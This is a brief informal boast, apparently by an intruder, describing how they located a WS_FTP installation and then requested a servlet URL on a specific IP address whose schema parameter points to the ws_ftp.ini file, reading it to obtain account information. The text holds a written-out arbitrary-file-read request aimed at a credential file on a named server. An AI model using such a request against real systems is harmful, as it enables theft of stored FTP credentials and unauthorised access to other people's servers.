We got the dir that a known program wsftp was installed.

We then changed the above to http://203.22.120.97:8080/servlet/TestServlet?schema=d:\Program Files\WS_FTP\ws_ftp.ini

From that we got the shiztnit and info to this current page you are looking at now.
